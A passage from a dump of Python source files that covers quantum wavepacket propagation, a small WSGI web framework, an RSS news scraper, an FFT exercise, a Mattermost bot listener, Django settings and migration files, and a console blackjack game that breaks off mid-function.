** 2 / 2.0\n\n v[0, 1] = v[1, 0] = 0\n\n return v\n\n# @jit\n# def x_evolve_half_2d(dt, v_2d, psi_grid):\n# \"\"\"\n# propagate the state in grid basis half time step forward with H = V\n# :param dt: float\n# time step\n# :param v_2d: float array\n# the two electronic states potential operator in grid basis\n# :param psi_grid: list\n# the two-electronic-states vibrational state in grid basis\n# :return: psi_grid(update): list\n# the two-electronic-states vibrational state in grid basis\n# after being half time step forward\n# \"\"\"\n\n# for i in range(len(x)):\n# for j in range(len(y)):\n# v_mat = np.array([[v_2d[0][i, j], v_2d[1][i, j]],\n# [v_2d[2][i, j], v_2d[3][i, j]]])\n\n# w, u = scipy.linalg.eigh(v_mat)\n# v = np.diagflat(np.exp(-0.5 * 1j * w / hbar * dt))\n# array_tmp = np.array([psi_grid[0][i, j], psi_grid[1][i, j]])\n# array_tmp = np.dot(u.conj().T, v.dot(u)).dot(array_tmp)\n# psi_grid[0][i, j] = array_tmp[0]\n# psi_grid[1][i, j] = array_tmp[1]\n# #self.x_evolve = self.x_evolve_half * self.x_evolve_half\n# #self.k_evolve = np.exp(-0.5 * 1j * self.hbar / self.m * \\\n# # (self.k * self.k) * dt)\n\n\n@jit\ndef x_evolve_2d(dt, psi, v):\n \"\"\"\n propagate the state in grid basis half time step forward with H = V\n :param dt: float\n time step\n :param v_2d: float array\n the two electronic states potential operator in grid basis\n :param psi_grid: list\n the two-electronic-states vibrational state in grid basis\n :return: psi_grid(update): list\n the two-electronic-states vibrational state in grid basis\n after being half time step forward\n \"\"\"\n\n\n vpsi = np.exp(- 1j * v * dt) * psi\n\n\n return vpsi\n\n\ndef k_evolve_2d(dt, kx, ky, psi):\n \"\"\"\n propagate the state in grid basis a time step forward with H = K\n :param dt: float, time step\n :param kx: float, momentum corresponding to x\n :param ky: float, momentum corresponding to y\n :param psi_grid: list, the two-electronic-states vibrational states in\n grid basis\n :return: psi_grid(update): list, the two-electronic-states vibrational\n states in grid basis\n \"\"\"\n\n psi_k = fft2(psi)\n mx, my = mass\n\n Kx, Ky = np.meshgrid(kx, ky)\n\n kin = np.exp(-1j * (Kx**2/2./mx + Ky**2/2./my) * dt)\n\n psi_k = kin * psi_k\n psi = ifft2(psi_k)\n\n return psi\n\n\ndef dpsi(psi, kx, ky, ndim=2):\n '''\n Momentum operator operates on the wavefunction\n\n Parameters\n ----------\n psi : 2D complex array\n DESCRIPTION.\n ndim : int, default 2\n coordinates dimension\n Returns\n -------\n kpsi : (nx, ny, ndim)\n DESCRIPTION.\n\n '''\n\n # Fourier transform of the wavefunction\n psi_k = fft2(psi)\n\n # momentum operator in the Fourier space\n kxpsi = np.einsum('i, ij -> ij', kx, psi_k)\n kypsi = np.einsum('j, ij -> ij', ky, psi_k)\n\n kpsi = np.zeros((nx, ny, ndim), dtype=complex)\n\n # transform back to coordinate space\n kpsi[:,:,0] = ifft2(kxpsi)\n kpsi[:,:,1] = ifft2(kypsi)\n\n return kpsi\n\ndef dxpsi(psi):\n '''\n Momentum operator operates on the wavefunction\n\n Parameters\n ----------\n psi : 2D complex array\n DESCRIPTION.\n\n Returns\n -------\n kpsi : (nx, ny, ndim)\n DESCRIPTION.\n\n '''\n\n # Fourier transform of the wavefunction\n psi_k = fft2(psi)\n\n # momentum operator in the Fourier space\n kxpsi_k = np.einsum('i, ij -> ij', kx, psi_k)\n\n # transform back to coordinate space\n kxpsi = ifft2(kxpsi_k)\n\n return kxpsi\n\ndef dypsi(psi):\n '''\n Momentum operator operates on the wavefunction\n\n Parameters\n ----------\n psi : 2D complex array\n DESCRIPTION.\n\n Returns\n -------\n kpsi : (nx, ny, ndim)\n 
DESCRIPTION.\n\n '''\n\n # Fourier transform of the wavefunction\n psi_k = fft2(psi)\n\n # momentum operator in the Fourier space\n kxpsi_k = np.einsum('i, ij -> ij', kx, psi_k)\n\n # transform back to coordinate space\n kxpsi = ifft2(kxpsi_k)\n\n return kxpsi\n\n\ndef adiabatic_2d(x, y, psi0, v, dt, Nt=0, coords='linear', mass=None, G=None):\n \"\"\"\n propagate the adiabatic dynamics at a single surface\n\n :param dt: time step\n :param v: 2d array\n potential matrices in 2D\n :param psi: list\n the initial state\n mass: list of 2 elements\n reduced mass\n\n Nt: int\n the number of the time steps, Nt=0 indicates that no propagation has been done,\n only the initial state and the initial purity would be\n the output\n\n G: 4D array nx, ny, ndim, ndim\n G-matrix\n\n :return: psi_end: list\n the final state\n\n G: 2d array\n G matrix only used for curvilinear coordinates\n \"\"\"\n #f = open('density_matrix.dat', 'w')\n t = 0.0\n dt2 = dt * 0.5\n\n psi = psi0.copy()\n\n nx, ny = psi.shape\n\n dx = x[1] - x[0]\n dy = y[1] - y[0]\n\n kx = 2. * np.pi * fftfreq(nx, dx)\n ky = 2. * np.pi * fftfreq(ny, dy)\n\n if coords == 'linear':\n # Split-operator method for linear coordinates\n\n psi = x_evolve_2d(dt2, psi,v)\n\n for i in range(Nt):\n t += dt\n psi = k_evolve_2d(dt, kx, ky, psi)\n psi = x_evolve_2d(dt, psi, v)\n\n elif coords == 'curvilinear':\n\n # kxpsi = np.einsum('i, ijn -> ijn', kx, psi_k)\n # kypsi = np.einsum('j, ijn -> ijn', ky, psi_k)\n\n # tpsi = np.zeros((nx, ny, nstates), dtype=complex)\n # dxpsi = np.zeros((nx, ny, nstates), dtype=complex)\n # dypsi = np.zeros((nx, ny, nstates), dtype=complex)\n\n # for i in range(nstates):\n\n # dxpsi[:,:,i] = ifft2(kxpsi[:,:,i])\n # dypsi[:,:,i] = ifft2(kypsi[:,:,i])\n\n for k in range(Nt):\n t += dt\n psi = rk4(psi, hpsi, dt, kx, ky, v, G)\n\n #f.write('{} {} {} {} {} \\n'.format(t, *rho))\n #purity[i] = output_tmp[4]\n\n\n\n # t += dt\n #f.close()\n\n return psi\n\ndef KEO(psi, kx, ky, G):\n '''\n compute kinetic energy operator K * psi\n\n Parameters\n ----------\n psi : TYPE\n DESCRIPTION.\n dt : TYPE\n DESCRIPTION.\n\n Returns\n -------\n None.\n\n '''\n# kpsi = dpsi(psi, kx, ky)\n\n # Fourier transform of the wavefunction\n psi_k = fft2(psi)\n\n # momentum operator in the Fourier space\n kxpsi = np.einsum('i, ij -> ij', kx, psi_k)\n kypsi = np.einsum('j, ij -> ij', ky, psi_k)\n\n nx, ny = len(kx), len(ky)\n kpsi = np.zeros((nx, ny, 2), dtype=complex)\n\n # transform back to coordinate space\n kpsi[:,:,0] = ifft2(kxpsi)\n kpsi[:,:,1] = ifft2(kypsi)\n\n# ax.contour(x, y, np.abs(kpsi[:,:,1]))\n\n tmp = np.einsum('ijrs, ijs -> ijr', G, kpsi)\n #G = metric_tensor(x[i], y[j]) # 2 x 2 matrix metric tensor at (x, y)\n\n # Fourier transform of the wavefunction\n phi_x = tmp[:,:,0]\n phi_y = tmp[:,:,1]\n\n phix_k = fft2(phi_x)\n phiy_k = fft2(phi_y)\n\n # momentum operator in the Fourier space\n kxphi = np.einsum('i, ij -> ij', kx, phix_k)\n kyphi = np.einsum('j, ij -> ij', ky, phiy_k)\n\n # transform back to coordinate space\n kxphi = ifft2(kxphi)\n kyphi = ifft2(kyphi)\n\n # psi += -1j * dt * 0.5 * (kxphi + kyphi)\n\n return 0.5 * (kxphi + kyphi)\n\ndef PEO(psi, v):\n \"\"\"\n V |psi>\n :param dt: float\n time step\n :param v_2d: float array\n the two electronic states potential operator in grid basis\n :param psi_grid: list\n the two-electronic-states vibrational state in grid basis\n :return: psi_grid(update): list\n the two-electronic-states vibrational state in grid basis\n after being half time step forward\n \"\"\"\n\n\n vpsi = v * psi\n 
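    # The potential V is diagonal on the coordinate grid, so applying it to psi is an elementwise product (no FFT needed here).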
return vpsi\n\ndef hpsi(psi, kx, ky, v, G):\n\n kpsi = KEO(psi, kx, ky, G)\n vpsi = PEO(psi, v)\n\n return -1j * (kpsi + vpsi)\n\n######################################################################\n# Helper functions for gaussian wave-packets\n\n\ndef gauss_k(k,a,x0,k0):\n \"\"\"\n analytical fourier transform of gauss_x(x), above\n \"\"\"\n return ((a / np.sqrt(np.pi))**0.5\n * np.exp(-0.5 * (a * (k - k0)) ** 2 - 1j * (k - k0) * x0))\n\n@jit\ndef theta(x):\n \"\"\"\n theta function :\n returns 0 if x<=0, and 1 if x>0\n \"\"\"\n x = np.asarray(x)\n y = np.zeros(x.shape)\n y[x > 0] = 1.0\n return y\n\n\ndef square_barrier(x, width, height):\n return height * (theta(x) - theta(x - width))\n\n@jit\ndef density_matrix(psi_grid):\n \"\"\"\n compute electronic purity from the wavefunction\n \"\"\"\n rho00 = np.sum(np.multiply(np.conj(psi_grid[0]), psi_grid[0]))*dx*dy\n rho01 = np.sum(np.multiply(np.conj(psi_grid[0]), psi_grid[1]))*dx*dy\n rho11 = np.sum(np.multiply(np.conj(psi_grid[1]), psi_grid[1]))*dx*dy\n\n purity = rho00**2 + 2*rho01*rho01.conj() + rho11**2\n\n return rho00, rho01, rho01.conj(), rho11, purity\n\n\n\nif __name__ == '__main__':\n\n # specify time steps and duration\n ndim = 2 # 2D problem, DO NOT CHANGE!\n dt = 0.01\n print('time step = {} fs'.format(dt * au2fs))\n\n num_steps = 2000\n\n\n nx = 2 ** 6\n ny = 2 ** 6\n xmin = -8\n xmax = -xmin\n ymin = -8\n ymax = -ymin\n x = np.linspace(xmin, xmax, nx)\n y = np.linspace(ymin, ymax, ny)\n dx = x[1] - x[0]\n dy = y[1] - y[0]\n\n # k-space grid\n kx = 2. * np.pi * fftfreq(nx, dx)\n ky = 2. * np.pi * fftfreq(ny, dy)\n\n X, Y = np.meshgrid(x, y)\n\n fig, ax = plt.subplots()\n v = 0.5 * (X**2 + Y**2)\n\n # for i in range(nx):\n # for j in range(ny):\n # v[i,j] = diabatic(x[i], y[j])[0,0]\n\n #ax.imshow(v)\n\n # specify constants\n mass = [1.0, 1.0] # particle mass\n\n x0, y0, kx0, ky0 = -3, -1, 2.0, 0\n\n #coeff1, phase = np.sqrt(0.5), 0\n\n print('x range = ', x[0], x[-1])\n print('dx = {}'.format(dx))\n print('number of grid points along x = {}'.format(nx))\n print('y range = ', y[0], y[-1])\n print('dy = {}'.format(dy))\n print('number of grid points along y = {}'.format(ny))\n\n sigma = np.identity(2) * 0.5\n\n psi0 = gauss_x_2d(sigma, x0, y0, kx0, ky0)\n\n fig, ax = plt.subplots()\n ax.contour(x, y, np.abs(psi0).T)\n\n #psi = psi0\n\n # propagate\n\n # store the final wavefunction\n #f = open('wft.dat','w')\n #for i in range(N):\n # f.write('{} {} {} \\n'.format(x[i], psi_x[i,0], psi_x[i,1]))\n #f.close()\n\n\n G = np.zeros((nx, ny, ndim, ndim))\n G[:,:,0, 0] = G[:,:,1, 1] = 1.\n\n fig, ax = plt.subplots()\n extent=[xmin, xmax, ymin, ymax]\n\n psi1 = adiabatic_2d(x, y, psi0, v, dt=dt, Nt=num_steps, coords='curvilinear',G=G)\n ax.contour(x,y, np.abs(psi1).T)\n\n fig, ax = plt.subplots()\n\n psi2 = adiabatic_2d(psi0, v, mass=mass, dt=dt, Nt=num_steps)\n ax.contour(x,y, np.abs(psi2).T)\n","sub_path":"lime/wpd.py","file_name":"wpd.py","file_ext":"py","file_size_in_byte":16850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"299351130","text":"# -*-coding:utf-8 -*-\nimport re\nfrom urllib.parse import parse_qs\nfrom http.cookies import SimpleCookie\n\nfrom jinja2 import Environment, PackageLoader\n\njinja_env = Environment(loader=PackageLoader('www', 'templates'))\n\n\nclass Request:\n def __call__(self, env):\n self.env = env\n self.status = '200 OK'\n self.header = [('Content-type', 'text/html')]\n self.content = ''\n self.file = None\n self._form = None\n\n @property\n 
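    # Thin read-only wrappers over the WSGI environ (REQUEST_METHOD, PATH_INFO, HTTP_REFERER).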
def method(self):\n return self.env['REQUEST_METHOD']\n\n @property\n def path(self):\n return self.env['PATH_INFO']\n\n @property\n def referer(self):\n return self.env.get('HTTP_REFERER')\n\n @property\n def form(self):\n if self._form:\n return self._form\n try:\n size = int(self.env.get('CONTENT_LENGTH'))\n except ValueError:\n size = 0\n body = self.env['wsgi.input'].read(size)\n dic = parse_qs(body.decode())\n dic = {k: v[0] for k, v in dic.items() if v}\n self._form = dic\n return dic\n\n def _cookie(self):\n try:\n return SimpleCookie(self.env['HTTP_COOKIE'])\n except KeyError:\n return SimpleCookie()\n\n @property\n def cookie(self):\n return {k: v.value for k, v in self._cookie().items() if v.value}\n\n def set_cookie(self, dic=None, **kwargs):\n cookie = self._cookie()\n if dic:\n cookie.load(dic)\n if kwargs:\n cookie.load(kwargs)\n out = cookie.output(header='', sep=' ')\n for i in out.split():\n self.header.append(('Set-Cookie', i))\n\n\nclass NotFound(Exception):\n def __init__(self, value=''):\n self.value = value\n\n def __str__(self):\n return '
<html><h1>404! Not Found This Page:{}</h1></html>
'.format(self.value)\n\n\nrequest = Request()\n\n\ndef render(html, dic=None, **kwargs):\n template = jinja_env.get_template(html)\n dic and kwargs.update(dic)\n request.content = template.render(**kwargs)\n return request\n\n\ndef redirect(path):\n request.status = '303 See Other'\n request.header.append(('Location', path))\n return request\n\n\nclass Application:\n def __init__(self):\n self.urls = dict()\n self.signed_cookie = dict()\n\n def __call__(self, environ, start_response):\n request(environ)\n try:\n response = self.delegate()\n assert isinstance(response, Request) is True, 'Invalid Response'\n start_response(response.status, response.header)\n if response.file:\n yield response.file\n return\n yield response.content.encode()\n except NotFound as e:\n start_response('404 Not Found', [('Content-type', 'text/plain')])\n yield (str(e)).encode()\n except AssertionError as e:\n print(e)\n\n def delegate(self):\n for pattern, func in self.urls.items():\n m = re.match(pattern, request.path)\n if m:\n groups = m.groups()\n if groups:\n return func(*groups)\n return func()\n raise NotFound(request.path)\n\n def route(self, pattern):\n pattern = '^{}$'.format(pattern)\n\n def decorator(func):\n self.urls[pattern] = func\n return func\n\n return decorator\n","sub_path":"www/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"14052526","text":"import feedparser\nfrom urllib import request\nfrom bs4 import BeautifulSoup\nimport sys\n\n\ntarget = open('ntv_corpus.txt', 'a')\nerror = open('ntv_error_log.txt','a')\nntvG = feedparser.parse('http://www.ntv.com.tr/gundem.rss')\nntvT = feedparser.parse('http://www.ntv.com.tr/turkiye.rss')\nntvD = feedparser.parse('http://www.ntv.com.tr/dunya.rss')\n\n\ndef parseNews(link):\n\n try:\n r = request.urlopen(link)\n page = r.read()#.decode('utf8')\n s = BeautifulSoup(page, \"html.parser\")\n\n\n \"\"\"\n existingLabels =''\n source = 'DHA'\n title = s.find_all('h1')[0].text\n subTitle = s.find_all('div', ('class', 'spot'))[0].contents[0].contents[0].text\n body = s.find_all('div', ('class', 'icerikyazi'))[0].text.split('\\n')[1]\n date = s.find_all('div', ('class', 'iceriktarih'))[0].text\n print('' + title)\n print('<subTitle>' + subTitle)\n print('<body>' + body)\n print('<date>' + date)\n print('<source>' + source)\n\n print(\"----------------------------\")\n data = 'title!!!ANT!!!' + title + '!!!ANT!!!' + 'subtitle!!!ANT!!!' + subTitle + '!!!ANT!!!' + 'body!!!ANT!!!' + body + '!!!ANT!!!' + 'existing_labels!!!ANT!!!' + str(\n existingLabels) + '!!!ANT!!!' + 'date!!!ANT!!!' + date + '!!!ANT!!!' + 'source!!!ANT!!!' + source + '\\n'\n\n target.write(data)\n \"\"\"\n except :\n error.write(\"!!! ERROR !!! 
---- \" + sys.exc_info()[0] + \" in link: \")\n error.write(link)\n\n\n\n\nfor item in ntvG.entries:\n if 'video' not in item.link and 'galeri' not in item.link:\n print (item.link)\n #parseNews(item.link)","sub_path":"Collectors/NTV_RSS_Parser.py","file_name":"NTV_RSS_Parser.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"130729682","text":"import numpy as np\nfrom numpy import fft\nfrom random import *\nfrom math import sin, cos, pi\nimport matplotlib.pyplot as plt\n\nn = 6\nw = 1200\nN = 64\nnumber = w/(n - 1)\n\nw_values = [w - n * number for n in range(n)]\nx = np.zeros(N)\n\nfor j in range(n):\n amp = choice([i for i in range(-10, 10) if i != 0])\n fi = randint(-360, 360)\n for i in range(N):\n x[i] += amp * sin(w_values[j] * i + fi)\n\ncoeff = np.zeros(shape=(N//2, N//2))\nfor i in range(N//2):\n for j in range(N//2):\n coeff[i][j] = cos(4*pi/N * i * j) + sin(4*pi/N * i * j)\n\ncoeff_N = np.zeros(N)\nfor i in range(N):\n coeff_N[i] = cos(2*pi/N * i) + sin(2*pi/N * i)\n\nF1 = np.zeros(N//2)\nF2 = np.zeros(N//2)\nF = np.zeros(N)\n\nfor i in range(N//2):\n for j in range(N//2):\n F2[i] += x[2*j] * coeff[i][j]\n F1[i] += x[2*j + 1] * coeff[i][j]\n\n\nfor i in range(N):\n if i < (N//2):\n F[i] += F2[i] + coeff_N[i] * F1[i]\n else:\n F[i] += F2[i - (N//2)] - coeff_N[i] * F1[i - (N//2)]\n\nFl = fft.fft(x)\nnump_graph = plt.plot(Fl)\nplt.ylabel('numpy')\nplt.grid()\nplt.savefig(\"numpy.png\")\n\nplt.ylabel('X')\nxpl = plt.plot(x)\nplt.grid()\nplt.savefig(\"x.png\")\nplt.clf()\nphase = plt.plot(F)\nplt.ylabel('F')\nplt.grid()\nplt.savefig(\"f.png\")","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"371327399","text":"import websockets\nimport Bot\nfrom command.Command import Command\nfrom command.CommandManager import CommandManager\nfrom command.impl.PrinterDrumLifecycle import PrinterDrumLifecycle\nfrom config.Config import Config\nimport json\n\n\nclass WebSocket:\n auth_cookie = ''\n uri = 'wss://' + Config.get_host() + '/api/v4/websocket'\n\n def __init__(self):\n self.auth_cookie = 'MMAUTHTOKEN=' + Config.get_access_token() + '; MMUSERID=' + Bot.Bot.get_bot().get_bot_id()\n\n async def listen(self):\n async with websockets.connect(\n uri=self.uri,\n extra_headers=[('Cookie', self.auth_cookie)]) \\\n as websocket:\n while True:\n receive = await websocket.recv()\n dump = json.loads(receive)\n if 'data' in dump:\n if 'post' in dump['data']:\n post_dump = dump['data']['post']\n post_dump = post_dump.strip()\n index = post_dump.index('message')\n message = post_dump[index + len('message') + 2:post_dump.index(',', index)]\n message = message[1:len(message) - 1]\n message = message.strip()\n if Command.is_command(message):\n if ' ' in message:\n command, arg = message.split(' ')\n CommandManager.check_command(command, arg)\n else:\n CommandManager.check_command(message, '')\n","sub_path":"connection/WebSocket.py","file_name":"WebSocket.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"625491358","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('comms', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n 
name='OnionDevApi',\n fields=[\n ('api_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='comms.Api')),\n ('schedule_id', models.CharField(help_text=b'A unique integer for identifying a request, provided by OnionDev', max_length=200)),\n ('auth_id', models.IntegerField(help_text=b'A unique integer for identifying message requests provided by OnionDev')),\n ],\n options={\n 'abstract': False,\n },\n bases=('comms.api',),\n ),\n ]\n","sub_path":"mentorship/comms/migrations/0002_oniondevapi.py","file_name":"0002_oniondevapi.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"285070733","text":"import os\nfrom .base import *\n\nPROJECT_DIR = os.path.dirname(__file__)\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Admins', 'admins@mi.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n # 'NAME': os.path.join(PROJECT_DIR, 'bd.sqlite'),\n 'NAME': 'pro',\n 'USER': 'menda', # TODO env var\n 'PASSWORD': 'postgres', # TODO env var\n 'HOST': '',\n 'PORT': '',\n }\n}\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/var/www/example.com/media/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://example.com/media/\", \"http://media.example.com/\"\nMEDIA_URL = ''\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/var/www/example.com/static/\"\nSTATIC_ROOT = ''\n\n# URL prefix for static files.\n# Example: \"http://example.com/static/\", \"http://static.example.com/\"\nSTATIC_URL = '/static/'\n\n# Make this unique, and don't share it with anybody. TODO\nSECRET_KEY = get_env_variable('SECRET_KEY')\n\nINSTALLED_APPS += (\n 'django_nose',\n)\n\nTEST_RUNNER = 'django_nose.NoseTestSuiteRunner'\n\nSOUTH_TESTS_MIGRATE = False\nSKIP_SOUTH_TESTS = True\n\n# A sample logging configuration. 
The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d '\n '%(thread)d %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'log_file': {\n 'level': 'DEBUG',\n 'class': 'logging.handlers.RotatingFileHandler',\n 'filename': os.path.join(PROJECT_DIR, 'django.log'),\n 'maxBytes': '16777216', # 16 MB\n 'formatter': 'verbose'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'app': {\n 'handlers': ['console', 'log_file'],\n 'level': 'DEBUG',\n 'propagate': True,\n }\n }\n}\n\nTHROTTLE_TIME = 5 # time to wait until next page parsed\n","sub_path":"website/website/settings/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"392698389","text":"import Shoe\nimport Users\nimport InputControl\n\nclass Player:\n def __init__(self, name):\n self.name = name\n self.sum = 0\n self.isInBeginBJ = False\n self.isWin = False\n self.isLose = False\n self.listOfCards = []\n self.deck = 0\n\nclass Dealer:\n def __init__(self):\n self.sum = 0\n self.isInBegLatBJ = False\n self.listOfCards = []\n self.receipts = 0\n\ndef preparing():\n print(\"Input a number of players!\")\n print(\"count: \", end=\"\")\n countOfPlayers = 0\n while True:\n countOfPlayers = input()\n if (InputControl.IControl(countOfPlayers, 0, True)):\n if (int(countOfPlayers) > Users.countOfUsers()):\n print(\"In the database not enough users!\")\n continue\n elif (int(countOfPlayers) < 1):\n print(\"There is not enough players!\")\n break\n\n listOfPlayers = []\n for i in range (int(countOfPlayers)):\n while True:\n print(\"user #\", i + 1, \": \", end=\"\")\n playerInput = input()\n if (InputControl.IControl(playerInput, 1, True)):\n if (Users.isUserExists(playerInput) == True):\n listOfPlayers.append(Player(playerInput))\n break\n else:\n print(\"User with such name not exists!\")\n\n countOfDecks = -1\n while (countOfDecks == -1):\n print(\"Input count of decks (1 - 8): \", end='')\n countOfDecks = Shoe.SetCountOfDecks()\n\n myShoe = Shoe.MakeShoe(countOfDecks)\n \n gameLoop(listOfPlayers, myShoe, countOfDecks)\n \n return\n\ndef gameLoop(players, shoe, countOfDecks):\n while True:\n for player in players:\n while True:\n print(\"Bet of player\", player.name, \": \", end='')\n playerInput = input()\n if (InputControl.IControl(playerInput, 0, True)):\n if (int(playerInput) <= Users.getBalance(player.name, False)):\n player.bet = int(playerInput)\n break\n elif (int(playerInput) < 0):\n print(\"Bet cannot be equal 0 or less then 0!\")\n else:\n print(\"This user have not enough coins!\")\n\n if (len(shoe) == 0):\n shoe = Shoe.MakeShoe(countOfDecks)\n \n player.listOfCards.append(shoe.pop())\n 
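            # Second card of the opening two-card deal for this player.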
player.listOfCards.append(shoe.pop())\n \n for q in range(0, 2):\n if (InputControl.IControl(str(player.listOfCards[q]), 1, False) == True):\n if (player.listOfCards[q] == 'A'):\n if (player.sum + 11 > 21):\n player.sum += 1\n else:\n player.sum += 11\n else:\n player.sum += 10\n else:\n player.sum += player.listOfCards[q]\n \n if (player.sum == 21):\n player.isInBeginBJ = True\n \n print()\n\n if (len(shoe) == 0):\n shoe = Shoe.MakeShoe(countOfDecks)\n\n dealer = Dealer()\n dealer.listOfCards.append(shoe.pop())\n if (InputControl.IControl(str(dealer.listOfCards[0]), 1, False) == True):\n if (dealer.listOfCards[0] == 'A'):\n if (dealer.sum + 11 > 21):\n dealer.sum += 1\n else:\n dealer.sum += 11\n else:\n dealer.sum += 10\n else:\n dealer.sum += dealer.listOfCards[0]\n\n if (dealer.sum == 10 or dealer.sum == 11):\n dealer.isInBegLatBJ = True\n\n print(\"First dealer's card:\", dealer.listOfCards[0])\n print(\"Dealer's sum:\", dealer.sum)\n\n ### Игра каждого по очереди\n for player in players:\n print(\"\\n****\", player.name, \"****\")\n print(\"Cards of player\", player.name, \":\", player.listOfCards[0], player.listOfCards[1])\n print(\"Sum of player\", player.name, \":\", player.sum)\n\n continueFlag = False\n if (player.isInBeginBJ == True):\n print(\"You have in begin BJ!!!\")\n if (dealer.isInBegLatBJ == True):\n Print(\"But dealer might have BJ too...\")\n if (dealer.sum == 11):\n print(\"Dealer have 'A', then You can get gain 1:1,\")\n print(\"or wait until the end of the game (get or wait)? : \", end='')\n while True:\n print(player.name,\": \", end = \"\")\n playerInput = input()\n if (InputControl.IControl(playerInput, 1, True)):\n if (playerInput == \"wait\"):\n continueFlag = True\n\n break\n elif (playerInput == \"get\"):\n Users.setBalance(player.name, player.deck)\n player.isWin = True\n continueFlag = True\n\n break\n else:\n print(\"Wrong input a command!\")\n else:\n print(\"Wait until the end of the game!\")\n continueFlag == True\n else:\n Users.setBalance(player.name, int(player.deck * 1.5))\n player.isWin = True\n continueFlag == True\n\n if (continueFlag == True):\n continue\n \n while True:\n while True:\n print(\"Will you take a card? (hit or stop)? 
: \", end='')\n playerInput = input()\n if (InputControl.IControl(playerInput, 1, True)):\n if (playerInput == \"hit\"):\n if (len(shoe) <= 0):\n shoe = Shoe.MakeShoe(countOfDecks)\n\n player.listOfCards.append(shoe.pop())\n if (InputControl.IControl(str(player.listOfCards[len(player.listOfCards) - 1]), 1, False) == True):\n if (player.listOfCards[len(player.listOfCards) - 1] == 'A'):\n if (player.sum + 11 > 21):\n player.sum += 1\n else:\n player.sum += 11\n else:\n player.sum += 10\n else:\n player.sum += player.listOfCards[len(player.listOfCards) - 1]\n\n print(\"Cards of player\", player.name, \": \", end='')\n for card in player.listOfCards:\n print(card, end=' ')\n print(\"\\nSum of player\", player.name, \":\", player.sum)\n\n if (player.sum > 21):\n print(\"Your sum more then 21, you lose!!!\")\n continueFlag = True\n player.isLose = True\n Users.setBalance(player.name, player.deck * -1)\n elif (player.sum == 21):\n print(\"You have BJ!!!\")\n continueFlag = True\n\n break\n elif (playerInput == \"stop\"):\n continueFlag = True\n\n break\n else:\n print(\"Wrong input a command!\")\n \n if (continueFlag == True):\n break\n\n \n ### Дилер\n print(\"\\n****Dealer****\")\n\n if (len(shoe) == 0):\n shoe = Shoe.MakeShoe(countOfDecks)\n\n while dealer.sum < 17:\n dealer.listOfCards.append(shoe.pop())\n if (InputControl.IControl(str(dealer.listOfCards[len(dealer.listOfCards) - 1]), 1, False) == True):\n if (dealer.listOfCards[len(dealer.listOfCards) - 1] == 'A'):\n if (dealer.sum + 11 > 21):\n dealer.sum += 1\n else:\n dealer.sum += 11\n else:\n dealer.sum += 10\n else:\n dealer.sum += dealer.listOfCards[len(dealer.listOfCards) - 1]\n\n print(\"Cards of dealer: \", end='')\n for card in dealer.listOfCards:\n print(card, end=' ')\n\n print(\"\\nSum of Dealer:\", dealer.sum, '\\n')\n\n ###Итог\n if (dealer.sum > 21):\n if (player.isLose == True):\n print(\"Player\", player.name, \"lose! He lost\", player.deck, \"coins!\")\n if (player.isWin == True):\n if (player.isInBeginBJ == True):\n print(\"Player\", player.name, \"Win! He get\", int(player.deck * 1.5), \"coins!\")\n else:\n print(\"Player\", player.name, \"Win! He get\", player.deck, \"coins!\")\n else:\n print(\"Player\", player.name, \"Win! He get\", player.deck, \"coins!\")\n Users.setBalance(player.name, player.deck)\n\n elif (len(dealer.listOfCards) == 2 and dealer.sum == 21):\n for player in players:\n if (player.sum == 21):\n if (player.isWin == True):\n print(\"Player\", player.name, \"Win! He get\", player.deck, \"coins!\")\n Users.setBalance(player.name, player.deck)\n else:\n print(\"Player\", player.name, \"stayed at his rate!\")\n else:\n print(\"Player\", player.name, \"lose! He lost\", player.deck, \"coins!\")\n Users.setBalance(player.name, player.deck * -1)\n else:\n for player in players:\n if (player.isInBeginBJ == True):\n if 